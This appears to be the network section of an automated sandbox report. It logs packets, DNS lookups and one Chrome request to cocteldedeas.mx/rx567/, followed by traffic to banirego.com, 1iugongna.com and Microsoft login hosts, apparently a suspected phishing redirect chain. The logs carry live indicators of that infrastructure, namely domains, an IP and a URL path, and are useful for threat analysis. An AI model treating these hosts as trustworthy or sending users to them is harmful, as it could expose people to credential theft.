                                                                              Jan 10, 2025 21:42:07.833935976 CET44349934207.174.40.182192.168.2.5
                                                                              Jan 10, 2025 21:42:07.833959103 CET44349934207.174.40.182192.168.2.5
                                                                              Jan 10, 2025 21:42:07.834011078 CET49934443192.168.2.5207.174.40.182
                                                                              Jan 10, 2025 21:42:07.834091902 CET44349934207.174.40.182192.168.2.5
                                                                              Jan 10, 2025 21:42:07.834130049 CET49934443192.168.2.5207.174.40.182
                                                                              Jan 10, 2025 21:42:07.834160089 CET49934443192.168.2.5207.174.40.182
                                                                              Jan 10, 2025 21:42:07.835794926 CET44349937207.174.40.182192.168.2.5
                                                                              Jan 10, 2025 21:42:07.835876942 CET44349937207.174.40.182192.168.2.5
                                                                              Jan 10, 2025 21:42:07.835931063 CET49937443192.168.2.5207.174.40.182
                                                                              Jan 10, 2025 21:42:07.836237907 CET49934443192.168.2.5207.174.40.182
                                                                              Jan 10, 2025 21:42:07.836271048 CET44349934207.174.40.182192.168.2.5
                                                                              Jan 10, 2025 21:42:07.840089083 CET49937443192.168.2.5207.174.40.182
                                                                              Jan 10, 2025 21:42:07.840123892 CET44349937207.174.40.182192.168.2.5
                                                                              Jan 10, 2025 21:42:07.864275932 CET49943443192.168.2.5207.174.40.182
                                                                              Jan 10, 2025 21:42:07.864330053 CET44349943207.174.40.182192.168.2.5
                                                                              Jan 10, 2025 21:42:07.864449978 CET49943443192.168.2.5207.174.40.182
                                                                              Jan 10, 2025 21:42:07.864686012 CET49943443192.168.2.5207.174.40.182
                                                                              Jan 10, 2025 21:42:07.864710093 CET44349943207.174.40.182192.168.2.5
                                                                              Jan 10, 2025 21:42:08.977513075 CET44349943207.174.40.182192.168.2.5
                                                                              Jan 10, 2025 21:42:08.986233950 CET49943443192.168.2.5207.174.40.182
                                                                              Jan 10, 2025 21:42:08.986243963 CET44349943207.174.40.182192.168.2.5
                                                                              Jan 10, 2025 21:42:08.986649036 CET44349943207.174.40.182192.168.2.5
                                                                              Jan 10, 2025 21:42:08.987374067 CET49943443192.168.2.5207.174.40.182
                                                                              Jan 10, 2025 21:42:08.987442970 CET44349943207.174.40.182192.168.2.5
                                                                              Jan 10, 2025 21:42:08.987629890 CET49943443192.168.2.5207.174.40.182
                                                                              Jan 10, 2025 21:42:08.987641096 CET44349943207.174.40.182192.168.2.5
                                                                              Jan 10, 2025 21:42:09.494870901 CET44349943207.174.40.182192.168.2.5
                                                                              Jan 10, 2025 21:42:09.497754097 CET44349943207.174.40.182192.168.2.5
                                                                              Jan 10, 2025 21:42:09.497821093 CET49943443192.168.2.5207.174.40.182
                                                                              Jan 10, 2025 21:42:09.560940981 CET49943443192.168.2.5207.174.40.182
                                                                              Jan 10, 2025 21:42:09.560975075 CET44349943207.174.40.182192.168.2.5
                                                                              Jan 10, 2025 21:42:10.783868074 CET44349931207.174.40.182192.168.2.5
                                                                              Jan 10, 2025 21:42:10.783943892 CET49931443192.168.2.5207.174.40.182
                                                                              Jan 10, 2025 21:42:10.783967972 CET44349931207.174.40.182192.168.2.5
                                                                              Jan 10, 2025 21:42:10.785713911 CET44349931207.174.40.182192.168.2.5
                                                                              Jan 10, 2025 21:42:10.785780907 CET49931443192.168.2.5207.174.40.182
                                                                              Jan 10, 2025 21:42:10.786027908 CET49931443192.168.2.5207.174.40.182
                                                                              Jan 10, 2025 21:42:10.786041975 CET44349931207.174.40.182192.168.2.5
                                                                              Jan 10, 2025 21:42:10.786051035 CET49931443192.168.2.5207.174.40.182
                                                                              Jan 10, 2025 21:42:10.786087990 CET49931443192.168.2.5207.174.40.182
                                                                              Jan 10, 2025 21:42:10.790570974 CET49957443192.168.2.5207.174.40.182
                                                                              Jan 10, 2025 21:42:10.790616035 CET44349957207.174.40.182192.168.2.5
                                                                              Jan 10, 2025 21:42:10.790730000 CET49957443192.168.2.5207.174.40.182
                                                                              Jan 10, 2025 21:42:10.791064978 CET49957443192.168.2.5207.174.40.182
                                                                              Jan 10, 2025 21:42:10.791075945 CET44349957207.174.40.182192.168.2.5
                                                                              Jan 10, 2025 21:42:11.309921026 CET44349957207.174.40.182192.168.2.5
                                                                              Jan 10, 2025 21:42:11.310354948 CET49957443192.168.2.5207.174.40.182
                                                                              Jan 10, 2025 21:42:11.310384989 CET44349957207.174.40.182192.168.2.5
                                                                              Jan 10, 2025 21:42:11.310761929 CET44349957207.174.40.182192.168.2.5
                                                                              Jan 10, 2025 21:42:11.311419010 CET49957443192.168.2.5207.174.40.182
                                                                              Jan 10, 2025 21:42:11.311486006 CET44349957207.174.40.182192.168.2.5
                                                                              Jan 10, 2025 21:42:11.311630011 CET49957443192.168.2.5207.174.40.182
                                                                              Jan 10, 2025 21:42:11.359328985 CET44349957207.174.40.182192.168.2.5
                                                                              Jan 10, 2025 21:42:11.763864040 CET44349957207.174.40.182192.168.2.5
                                                                              Jan 10, 2025 21:42:11.763933897 CET49957443192.168.2.5207.174.40.182
                                                                              Jan 10, 2025 21:42:11.763945103 CET44349957207.174.40.182192.168.2.5
                                                                              Jan 10, 2025 21:42:11.763957977 CET44349957207.174.40.182192.168.2.5
                                                                              Jan 10, 2025 21:42:11.764014006 CET49957443192.168.2.5207.174.40.182
                                                                              Jan 10, 2025 21:42:11.765620947 CET49957443192.168.2.5207.174.40.182
                                                                              Jan 10, 2025 21:42:11.765635967 CET44349957207.174.40.182192.168.2.5
                                                                              Jan 10, 2025 21:42:25.264106035 CET4972780192.168.2.5188.114.96.3
                                                                              Jan 10, 2025 21:42:25.268990993 CET8049727188.114.96.3192.168.2.5
                                                                              Jan 10, 2025 21:42:35.172775030 CET50080443192.168.2.5142.250.185.228
                                                                              Jan 10, 2025 21:42:35.172812939 CET44350080142.250.185.228192.168.2.5
                                                                              Jan 10, 2025 21:42:35.172971010 CET50080443192.168.2.5142.250.185.228
                                                                              Jan 10, 2025 21:42:35.173192978 CET50080443192.168.2.5142.250.185.228
                                                                              Jan 10, 2025 21:42:35.173202991 CET44350080142.250.185.228192.168.2.5
                                                                              Jan 10, 2025 21:42:35.826334000 CET44350080142.250.185.228192.168.2.5
                                                                              Jan 10, 2025 21:42:35.826889992 CET50080443192.168.2.5142.250.185.228
                                                                              Jan 10, 2025 21:42:35.826899052 CET44350080142.250.185.228192.168.2.5
                                                                              Jan 10, 2025 21:42:35.827210903 CET44350080142.250.185.228192.168.2.5
                                                                              Jan 10, 2025 21:42:35.827585936 CET50080443192.168.2.5142.250.185.228
                                                                              Jan 10, 2025 21:42:35.827635050 CET44350080142.250.185.228192.168.2.5
                                                                              Jan 10, 2025 21:42:35.874120951 CET50080443192.168.2.5142.250.185.228
                                                                              Jan 10, 2025 21:42:37.969364882 CET50081443192.168.2.535.190.80.1
                                                                              Jan 10, 2025 21:42:37.969424963 CET4435008135.190.80.1192.168.2.5
                                                                              Jan 10, 2025 21:42:37.969633102 CET50081443192.168.2.535.190.80.1
                                                                              Jan 10, 2025 21:42:37.969873905 CET50081443192.168.2.535.190.80.1
                                                                              Jan 10, 2025 21:42:37.969883919 CET4435008135.190.80.1192.168.2.5
                                                                              Jan 10, 2025 21:42:38.435121059 CET4435008135.190.80.1192.168.2.5
                                                                              Jan 10, 2025 21:42:38.437180996 CET50081443192.168.2.535.190.80.1
                                                                              Jan 10, 2025 21:42:38.437210083 CET4435008135.190.80.1192.168.2.5
                                                                              Jan 10, 2025 21:42:38.437669992 CET4435008135.190.80.1192.168.2.5
                                                                              Jan 10, 2025 21:42:38.442804098 CET50081443192.168.2.535.190.80.1
                                                                              Jan 10, 2025 21:42:38.442804098 CET50081443192.168.2.535.190.80.1
                                                                              Jan 10, 2025 21:42:38.442938089 CET4435008135.190.80.1192.168.2.5
                                                                              Jan 10, 2025 21:42:38.486805916 CET50081443192.168.2.535.190.80.1
                                                                              Jan 10, 2025 21:42:38.580535889 CET4435008135.190.80.1192.168.2.5
                                                                              Jan 10, 2025 21:42:38.580631971 CET4435008135.190.80.1192.168.2.5
                                                                              Jan 10, 2025 21:42:38.581727028 CET50081443192.168.2.535.190.80.1
                                                                              Jan 10, 2025 21:42:38.581727028 CET50081443192.168.2.535.190.80.1
                                                                              Jan 10, 2025 21:42:38.581845045 CET50083443192.168.2.535.190.80.1
                                                                              Jan 10, 2025 21:42:38.581887960 CET4435008335.190.80.1192.168.2.5
                                                                              Jan 10, 2025 21:42:38.582089901 CET50083443192.168.2.535.190.80.1
                                                                              Jan 10, 2025 21:42:38.582473993 CET50083443192.168.2.535.190.80.1
                                                                              Jan 10, 2025 21:42:38.582489014 CET4435008335.190.80.1192.168.2.5
                                                                              Jan 10, 2025 21:42:38.890523911 CET50081443192.168.2.535.190.80.1
                                                                              Jan 10, 2025 21:42:38.890552044 CET4435008135.190.80.1192.168.2.5
                                                                              Jan 10, 2025 21:42:39.037494898 CET4435008335.190.80.1192.168.2.5
                                                                              Jan 10, 2025 21:42:39.038808107 CET50083443192.168.2.535.190.80.1
                                                                              Jan 10, 2025 21:42:39.038830996 CET4435008335.190.80.1192.168.2.5
                                                                              Jan 10, 2025 21:42:39.039254904 CET4435008335.190.80.1192.168.2.5
                                                                              Jan 10, 2025 21:42:39.040596962 CET50083443192.168.2.535.190.80.1
                                                                              Jan 10, 2025 21:42:39.040596962 CET50083443192.168.2.535.190.80.1
                                                                              Jan 10, 2025 21:42:39.040622950 CET4435008335.190.80.1192.168.2.5
                                                                              Jan 10, 2025 21:42:39.040707111 CET4435008335.190.80.1192.168.2.5
                                                                              Jan 10, 2025 21:42:39.094806910 CET50083443192.168.2.535.190.80.1
                                                                              Jan 10, 2025 21:42:39.167608023 CET4435008335.190.80.1192.168.2.5
                                                                              Jan 10, 2025 21:42:39.167699099 CET4435008335.190.80.1192.168.2.5
                                                                              Jan 10, 2025 21:42:39.169825077 CET50083443192.168.2.535.190.80.1
                                                                              Jan 10, 2025 21:42:39.169825077 CET50083443192.168.2.535.190.80.1
                                                                              Jan 10, 2025 21:42:39.478828907 CET50083443192.168.2.535.190.80.1
                                                                              Jan 10, 2025 21:42:39.478861094 CET4435008335.190.80.1192.168.2.5
                                                                              Jan 10, 2025 21:42:41.654830933 CET49827443192.168.2.5207.174.40.182
                                                                              Jan 10, 2025 21:42:41.654855967 CET44349827207.174.40.182192.168.2.5
                                                                              Jan 10, 2025 21:42:45.756856918 CET44350080142.250.185.228192.168.2.5
                                                                              Jan 10, 2025 21:42:45.756938934 CET44350080142.250.185.228192.168.2.5
                                                                              Jan 10, 2025 21:42:45.756999016 CET50080443192.168.2.5142.250.185.228
                                                                              Jan 10, 2025 21:42:47.642297029 CET50080443192.168.2.5142.250.185.228
                                                                              Jan 10, 2025 21:42:47.642322063 CET44350080142.250.185.228192.168.2.5
                                                                              TimestampSource PortDest PortSource IPDest IP
                                                                              Jan 10, 2025 21:41:31.221261024 CET53560011.1.1.1192.168.2.5
                                                                              Jan 10, 2025 21:41:31.362586975 CET53651851.1.1.1192.168.2.5
                                                                              Jan 10, 2025 21:41:32.365945101 CET53639701.1.1.1192.168.2.5
                                                                              Jan 10, 2025 21:41:35.109375000 CET6163453192.168.2.51.1.1.1
                                                                              Jan 10, 2025 21:41:35.109510899 CET5247053192.168.2.51.1.1.1
                                                                              Jan 10, 2025 21:41:35.116188049 CET53524701.1.1.1192.168.2.5
                                                                              Jan 10, 2025 21:41:35.116389990 CET53616341.1.1.1192.168.2.5
                                                                              Jan 10, 2025 21:41:36.492099047 CET5189353192.168.2.51.1.1.1
                                                                              Jan 10, 2025 21:41:36.492420912 CET6216853192.168.2.51.1.1.1
                                                                              Jan 10, 2025 21:41:36.623003006 CET53518931.1.1.1192.168.2.5
                                                                              Jan 10, 2025 21:41:36.640907049 CET53621681.1.1.1192.168.2.5
                                                                              Jan 10, 2025 21:41:37.961425066 CET5464653192.168.2.51.1.1.1
                                                                              Jan 10, 2025 21:41:37.961990118 CET5250253192.168.2.51.1.1.1
                                                                              Jan 10, 2025 21:41:37.968110085 CET53546461.1.1.1192.168.2.5
                                                                              Jan 10, 2025 21:41:37.968648911 CET53525021.1.1.1192.168.2.5
                                                                              Jan 10, 2025 21:41:39.747288942 CET4998753192.168.2.51.1.1.1
                                                                              Jan 10, 2025 21:41:39.747416973 CET5714753192.168.2.51.1.1.1
                                                                              Jan 10, 2025 21:41:39.759551048 CET53499871.1.1.1192.168.2.5
                                                                              Jan 10, 2025 21:41:39.769412994 CET53571471.1.1.1192.168.2.5
                                                                              Jan 10, 2025 21:41:40.943393946 CET5170253192.168.2.51.1.1.1
                                                                              Jan 10, 2025 21:41:40.943810940 CET5975053192.168.2.51.1.1.1
                                                                              Jan 10, 2025 21:41:40.958787918 CET53597501.1.1.1192.168.2.5
                                                                              Jan 10, 2025 21:41:41.126950026 CET53517021.1.1.1192.168.2.5
                                                                              Jan 10, 2025 21:41:41.996170998 CET5234953192.168.2.51.1.1.1
                                                                              Jan 10, 2025 21:41:41.996439934 CET5970753192.168.2.51.1.1.1
                                                                              Jan 10, 2025 21:41:42.002791882 CET53523491.1.1.1192.168.2.5
                                                                              Jan 10, 2025 21:41:42.003470898 CET53597071.1.1.1192.168.2.5
                                                                              Jan 10, 2025 21:41:43.442186117 CET5588053192.168.2.51.1.1.1
                                                                              Jan 10, 2025 21:41:43.442374945 CET5888853192.168.2.51.1.1.1
                                                                              Jan 10, 2025 21:41:43.449125051 CET53558801.1.1.1192.168.2.5
                                                                              Jan 10, 2025 21:41:43.449160099 CET53588881.1.1.1192.168.2.5
                                                                              Jan 10, 2025 21:41:43.459367990 CET6086653192.168.2.51.1.1.1
                                                                              Jan 10, 2025 21:41:43.459530115 CET5502453192.168.2.51.1.1.1
                                                                              Jan 10, 2025 21:41:43.466274977 CET53550241.1.1.1192.168.2.5
                                                                              Jan 10, 2025 21:41:43.466286898 CET53608661.1.1.1192.168.2.5
                                                                              Jan 10, 2025 21:41:49.414988995 CET53562951.1.1.1192.168.2.5
                                                                              Jan 10, 2025 21:41:56.996368885 CET6168453192.168.2.51.1.1.1
                                                                              Jan 10, 2025 21:41:56.996560097 CET5808353192.168.2.51.1.1.1
                                                                              Jan 10, 2025 21:41:57.009457111 CET53616841.1.1.1192.168.2.5
                                                                              Jan 10, 2025 21:41:57.009730101 CET53580831.1.1.1192.168.2.5
                                                                              Jan 10, 2025 21:41:59.856679916 CET5426053192.168.2.51.1.1.1
                                                                              Jan 10, 2025 21:41:59.856858969 CET5258553192.168.2.51.1.1.1
                                                                              Jan 10, 2025 21:41:59.873497963 CET53525851.1.1.1192.168.2.5
                                                                              Jan 10, 2025 21:42:00.038736105 CET53542601.1.1.1192.168.2.5
                                                                              Jan 10, 2025 21:42:01.212979078 CET5281353192.168.2.51.1.1.1
                                                                              Jan 10, 2025 21:42:01.213416100 CET6162153192.168.2.51.1.1.1
                                                                              Jan 10, 2025 21:42:01.219760895 CET53528131.1.1.1192.168.2.5
                                                                              Jan 10, 2025 21:42:01.220817089 CET53616211.1.1.1192.168.2.5
                                                                              Jan 10, 2025 21:42:03.807863951 CET5547753192.168.2.51.1.1.1
                                                                              Jan 10, 2025 21:42:03.808094978 CET5852553192.168.2.51.1.1.1
                                                                              Jan 10, 2025 21:42:03.846349001 CET53585251.1.1.1192.168.2.5
                                                                              Jan 10, 2025 21:42:05.006508112 CET5778853192.168.2.51.1.1.1
                                                                              Jan 10, 2025 21:42:05.006688118 CET5819153192.168.2.51.1.1.1
                                                                              Jan 10, 2025 21:42:05.013360977 CET53577881.1.1.1192.168.2.5
                                                                              Jan 10, 2025 21:42:05.013804913 CET53581911.1.1.1192.168.2.5
                                                                              Jan 10, 2025 21:42:07.157154083 CET53589541.1.1.1192.168.2.5
                                                                              Jan 10, 2025 21:42:08.981292963 CET53643741.1.1.1192.168.2.5
                                                                              Jan 10, 2025 21:42:30.948821068 CET53554721.1.1.1192.168.2.5
                                                                              Jan 10, 2025 21:42:31.034424067 CET53583181.1.1.1192.168.2.5
                                                                              Jan 10, 2025 21:42:37.968887091 CET5049253192.168.2.51.1.1.1
                                                                              Jan 10, 2025 21:42:37.969053030 CET5204553192.168.2.51.1.1.1
                                                                              TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                              Jan 10, 2025 21:41:35.109375000 CET192.168.2.51.1.1.10x5880Standard query (0)www.google.comA (IP address)IN (0x0001)false
                                                                              Jan 10, 2025 21:41:35.109510899 CET192.168.2.51.1.1.10x775cStandard query (0)www.google.com65IN (0x0001)false
                                                                              Jan 10, 2025 21:41:36.492099047 CET192.168.2.51.1.1.10x1d3cStandard query (0)cocteldedeas.mxA (IP address)IN (0x0001)false
                                                                              Jan 10, 2025 21:41:36.492420912 CET192.168.2.51.1.1.10xa2dbStandard query (0)cocteldedeas.mx65IN (0x0001)false
                                                                              Jan 10, 2025 21:41:37.961425066 CET192.168.2.51.1.1.10xbf03Standard query (0)a.nel.cloudflare.comA (IP address)IN (0x0001)false
                                                                              Jan 10, 2025 21:41:37.961990118 CET192.168.2.51.1.1.10xc280Standard query (0)a.nel.cloudflare.com65IN (0x0001)false
                                                                              Jan 10, 2025 21:41:39.747288942 CET192.168.2.51.1.1.10x3fddStandard query (0)cocteldedeas.mxA (IP address)IN (0x0001)false
                                                                              Jan 10, 2025 21:41:39.747416973 CET192.168.2.51.1.1.10x55f6Standard query (0)cocteldedeas.mx65IN (0x0001)false
                                                                              Jan 10, 2025 21:41:40.943393946 CET192.168.2.51.1.1.10xa65bStandard query (0)banirego.comA (IP address)IN (0x0001)false
                                                                              Jan 10, 2025 21:41:40.943810940 CET192.168.2.51.1.1.10x3fb6Standard query (0)banirego.com65IN (0x0001)false
                                                                              Jan 10, 2025 21:41:41.996170998 CET192.168.2.51.1.1.10xe8e9Standard query (0)challenges.cloudflare.comA (IP address)IN (0x0001)false
                                                                              Jan 10, 2025 21:41:41.996439934 CET192.168.2.51.1.1.10xf3f9Standard query (0)challenges.cloudflare.com65IN (0x0001)false
                                                                              Jan 10, 2025 21:41:43.442186117 CET192.168.2.51.1.1.10xf96Standard query (0)challenges.cloudflare.comA (IP address)IN (0x0001)false
                                                                              Jan 10, 2025 21:41:43.442374945 CET192.168.2.51.1.1.10x4a52Standard query (0)challenges.cloudflare.com65IN (0x0001)false
                                                                              Jan 10, 2025 21:41:43.459367990 CET192.168.2.51.1.1.10xe651Standard query (0)challenges.cloudflare.comA (IP address)IN (0x0001)false
                                                                              Jan 10, 2025 21:41:43.459530115 CET192.168.2.51.1.1.10xf1d2Standard query (0)challenges.cloudflare.com65IN (0x0001)false
                                                                              Jan 10, 2025 21:41:56.996368885 CET192.168.2.51.1.1.10xf2aeStandard query (0)1iugongna.comA (IP address)IN (0x0001)false
                                                                              Jan 10, 2025 21:41:56.996560097 CET192.168.2.51.1.1.10x5ee7Standard query (0)1iugongna.com65IN (0x0001)false
                                                                              Jan 10, 2025 21:41:59.856679916 CET192.168.2.51.1.1.10x81eStandard query (0)1iugongna.comA (IP address)IN (0x0001)false
                                                                              Jan 10, 2025 21:41:59.856858969 CET192.168.2.51.1.1.10x2d84Standard query (0)1iugongna.com65IN (0x0001)false
                                                                              Jan 10, 2025 21:42:01.212979078 CET192.168.2.51.1.1.10xbb76Standard query (0)aadcdn.msftauth.netA (IP address)IN (0x0001)false
                                                                              Jan 10, 2025 21:42:01.213416100 CET192.168.2.51.1.1.10xb5fdStandard query (0)aadcdn.msftauth.net65IN (0x0001)false
                                                                              Jan 10, 2025 21:42:03.807863951 CET192.168.2.51.1.1.10x3c7bStandard query (0)portal.microsoftonline.comA (IP address)IN (0x0001)false
                                                                              Jan 10, 2025 21:42:03.808094978 CET192.168.2.51.1.1.10x9512Standard query (0)portal.microsoftonline.com65IN (0x0001)false
                                                                              Jan 10, 2025 21:42:05.006508112 CET192.168.2.51.1.1.10xcb2eStandard query (0)autologon.microsoftazuread-sso.comA (IP address)IN (0x0001)false
                                                                              Jan 10, 2025 21:42:05.006688118 CET192.168.2.51.1.1.10xeb04Standard query (0)autologon.microsoftazuread-sso.com65IN (0x0001)false
                                                                              Jan 10, 2025 21:42:37.968887091 CET192.168.2.51.1.1.10x455cStandard query (0)identity.nel.measure.office.netA (IP address)IN (0x0001)false
                                                                              Jan 10, 2025 21:42:37.969053030 CET192.168.2.51.1.1.10x2a43Standard query (0)identity.nel.measure.office.net65IN (0x0001)false
                                                                              TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                              Jan 10, 2025 21:41:35.116188049 CET1.1.1.1192.168.2.50x775cNo error (0)www.google.com65IN (0x0001)false
                                                                              Jan 10, 2025 21:41:35.116389990 CET1.1.1.1192.168.2.50x5880No error (0)www.google.com142.250.185.228A (IP address)IN (0x0001)false
                                                                              Jan 10, 2025 21:41:36.623003006 CET1.1.1.1192.168.2.50x1d3cNo error (0)cocteldedeas.mx188.114.97.3A (IP address)IN (0x0001)false
                                                                              Jan 10, 2025 21:41:36.623003006 CET1.1.1.1192.168.2.50x1d3cNo error (0)cocteldedeas.mx188.114.96.3A (IP address)IN (0x0001)false
                                                                              Jan 10, 2025 21:41:36.640907049 CET1.1.1.1192.168.2.50xa2dbNo error (0)cocteldedeas.mx65IN (0x0001)false
                                                                              Jan 10, 2025 21:41:37.968110085 CET1.1.1.1192.168.2.50xbf03No error (0)a.nel.cloudflare.com35.190.80.1A (IP address)IN (0x0001)false
                                                                              Jan 10, 2025 21:41:39.759551048 CET1.1.1.1192.168.2.50x3fddNo error (0)cocteldedeas.mx188.114.96.3A (IP address)IN (0x0001)false
                                                                              Jan 10, 2025 21:41:39.759551048 CET1.1.1.1192.168.2.50x3fddNo error (0)cocteldedeas.mx188.114.97.3A (IP address)IN (0x0001)false
                                                                              Jan 10, 2025 21:41:39.769412994 CET1.1.1.1192.168.2.50x55f6No error (0)cocteldedeas.mx65IN (0x0001)false
                                                                              Jan 10, 2025 21:41:41.126950026 CET1.1.1.1192.168.2.50xa65bNo error (0)banirego.com207.174.40.182A (IP address)IN (0x0001)false
                                                                              Jan 10, 2025 21:41:42.002791882 CET1.1.1.1192.168.2.50xe8e9No error (0)challenges.cloudflare.com104.18.95.41A (IP address)IN (0x0001)false
                                                                              Jan 10, 2025 21:41:42.002791882 CET1.1.1.1192.168.2.50xe8e9No error (0)challenges.cloudflare.com104.18.94.41A (IP address)IN (0x0001)false
                                                                              Jan 10, 2025 21:41:42.003470898 CET1.1.1.1192.168.2.50xf3f9No error (0)challenges.cloudflare.com65IN (0x0001)false
                                                                              Jan 10, 2025 21:41:43.449125051 CET1.1.1.1192.168.2.50xf96No error (0)challenges.cloudflare.com104.18.95.41A (IP address)IN (0x0001)false
                                                                              Jan 10, 2025 21:41:43.449125051 CET1.1.1.1192.168.2.50xf96No error (0)challenges.cloudflare.com104.18.94.41A (IP address)IN (0x0001)false
                                                                              Jan 10, 2025 21:41:43.449160099 CET1.1.1.1192.168.2.50x4a52No error (0)challenges.cloudflare.com65IN (0x0001)false
                                                                              Jan 10, 2025 21:41:43.466274977 CET1.1.1.1192.168.2.50xf1d2No error (0)challenges.cloudflare.com65IN (0x0001)false
                                                                              Jan 10, 2025 21:41:43.466286898 CET1.1.1.1192.168.2.50xe651No error (0)challenges.cloudflare.com104.18.94.41A (IP address)IN (0x0001)false
                                                                              Jan 10, 2025 21:41:43.466286898 CET1.1.1.1192.168.2.50xe651No error (0)challenges.cloudflare.com104.18.95.41A (IP address)IN (0x0001)false
                                                                              Jan 10, 2025 21:41:57.009457111 CET1.1.1.1192.168.2.50xf2aeNo error (0)1iugongna.com207.174.40.182A (IP address)IN (0x0001)false
                                                                              Jan 10, 2025 21:41:58.856816053 CET1.1.1.1192.168.2.50x195bNo error (0)csp-afd-prod.azurefd.netazurefd-t-prod.trafficmanager.netCNAME (Canonical name)IN (0x0001)false
                                                                              Jan 10, 2025 21:41:58.856945992 CET1.1.1.1192.168.2.50xfbe3No error (0)csp-afd-prod.azurefd.netazurefd-t-prod.trafficmanager.netCNAME (Canonical name)IN (0x0001)false
                                                                              Jan 10, 2025 21:41:58.856945992 CET1.1.1.1192.168.2.50xfbe3No error (0)shed.dual-low.s-part-0017.t-0009.t-msedge.nets-part-0017.t-0009.t-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                                              Jan 10, 2025 21:41:58.856945992 CET1.1.1.1192.168.2.50xfbe3No error (0)s-part-0017.t-0009.t-msedge.net13.107.246.45A (IP address)IN (0x0001)false
                                                                              Jan 10, 2025 21:42:00.038736105 CET1.1.1.1192.168.2.50x81eNo error (0)1iugongna.com207.174.40.182A (IP address)IN (0x0001)false
                                                                              Jan 10, 2025 21:42:01.209019899 CET1.1.1.1192.168.2.50x791bNo error (0)shed.dual-low.s-part-0017.t-0009.t-msedge.nets-part-0017.t-0009.t-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                                              Jan 10, 2025 21:42:01.209019899 CET1.1.1.1192.168.2.50x791bNo error (0)s-part-0017.t-0009.t-msedge.net13.107.246.45A (IP address)IN (0x0001)false
                                                                              Jan 10, 2025 21:42:01.219760895 CET1.1.1.1192.168.2.50xbb76No error (0)aadcdn.msftauth.netscdn38e6f.wpc.9be8f.omegacdn.netCNAME (Canonical name)IN (0x0001)false
                                                                              Jan 10, 2025 21:42:01.219760895 CET1.1.1.1192.168.2.50xbb76No error (0)scdn38e6f.wpc.9be8f.omegacdn.netsni1gl.wpc.omegacdn.netCNAME (Canonical name)IN (0x0001)false
                                                                              Jan 10, 2025 21:42:01.219760895 CET1.1.1.1192.168.2.50xbb76No error (0)sni1gl.wpc.omegacdn.net152.199.21.175A (IP address)IN (0x0001)false
                                                                              Jan 10, 2025 21:42:01.220817089 CET1.1.1.1192.168.2.50xb5fdNo error (0)aadcdn.msftauth.netscdn38e6f.wpc.9be8f.omegacdn.netCNAME (Canonical name)IN (0x0001)false
                                                                              Jan 10, 2025 21:42:01.220817089 CET1.1.1.1192.168.2.50xb5fdNo error (0)scdn38e6f.wpc.9be8f.omegacdn.netsni1gl.wpc.omegacdn.netCNAME (Canonical name)IN (0x0001)false
                                                                              Jan 10, 2025 21:42:03.839736938 CET1.1.1.1192.168.2.50x3c7bNo error (0)portal.microsoftonline.comadmin-portal.office.comCNAME (Canonical name)IN (0x0001)false
                                                                              Jan 10, 2025 21:42:03.839736938 CET1.1.1.1192.168.2.50x3c7bNo error (0)admin-portal.office.comportal-office365-com.b-0004.b-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                                              Jan 10, 2025 21:42:03.846349001 CET1.1.1.1192.168.2.50x9512No error (0)portal.microsoftonline.comadmin-portal.office.comCNAME (Canonical name)IN (0x0001)false
                                                                              Jan 10, 2025 21:42:03.846349001 CET1.1.1.1192.168.2.50x9512No error (0)admin-portal.office.comportal-office365-com.b-0004.b-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                                              Jan 10, 2025 21:42:05.013360977 CET1.1.1.1192.168.2.50xcb2eNo error (0)autologon.microsoftazuread-sso.com20.190.160.20A (IP address)IN (0x0001)false
                                                                              Jan 10, 2025 21:42:05.013360977 CET1.1.1.1192.168.2.50xcb2eNo error (0)autologon.microsoftazuread-sso.com20.190.160.17A (IP address)IN (0x0001)false
                                                                              Jan 10, 2025 21:42:05.013360977 CET1.1.1.1192.168.2.50xcb2eNo error (0)autologon.microsoftazuread-sso.com20.190.160.14A (IP address)IN (0x0001)false
                                                                              Jan 10, 2025 21:42:05.013360977 CET1.1.1.1192.168.2.50xcb2eNo error (0)autologon.microsoftazuread-sso.com40.126.32.134A (IP address)IN (0x0001)false
                                                                              Jan 10, 2025 21:42:05.013360977 CET1.1.1.1192.168.2.50xcb2eNo error (0)autologon.microsoftazuread-sso.com40.126.32.140A (IP address)IN (0x0001)false
                                                                              Jan 10, 2025 21:42:05.013360977 CET1.1.1.1192.168.2.50xcb2eNo error (0)autologon.microsoftazuread-sso.com40.126.32.68A (IP address)IN (0x0001)false
                                                                              Jan 10, 2025 21:42:05.013360977 CET1.1.1.1192.168.2.50xcb2eNo error (0)autologon.microsoftazuread-sso.com40.126.32.138A (IP address)IN (0x0001)false
                                                                              Jan 10, 2025 21:42:05.013360977 CET1.1.1.1192.168.2.50xcb2eNo error (0)autologon.microsoftazuread-sso.com20.190.160.22A (IP address)IN (0x0001)false
                                                                              Jan 10, 2025 21:42:37.976093054 CET1.1.1.1192.168.2.50x2a43No error (0)identity.nel.measure.office.netnel.measure.office.net.edgesuite.netCNAME (Canonical name)IN (0x0001)false
                                                                              Jan 10, 2025 21:42:37.976155043 CET1.1.1.1192.168.2.50x455cNo error (0)identity.nel.measure.office.netnel.measure.office.net.edgesuite.netCNAME (Canonical name)IN (0x0001)false
                                                                              • cocteldedeas.mx
                                                                              • https:
                                                                                • banirego.com
                                                                                • challenges.cloudflare.com
                                                                                • 1iugongna.com
                                                                                • autologon.microsoftazuread-sso.com
                                                                              • a.nel.cloudflare.com
                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              0192.168.2.549727188.114.96.3802848C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              Jan 10, 2025 21:41:39.775279045 CET858OUTGET /rx567/ HTTP/1.1
                                                                              Host: cocteldedeas.mx
                                                                              Connection: keep-alive
                                                                              Cache-Control: max-age=0
                                                                              Upgrade-Insecure-Requests: 1
                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                              Accept-Encoding: gzip, deflate
                                                                              Accept-Language: en-US,en;q=0.9
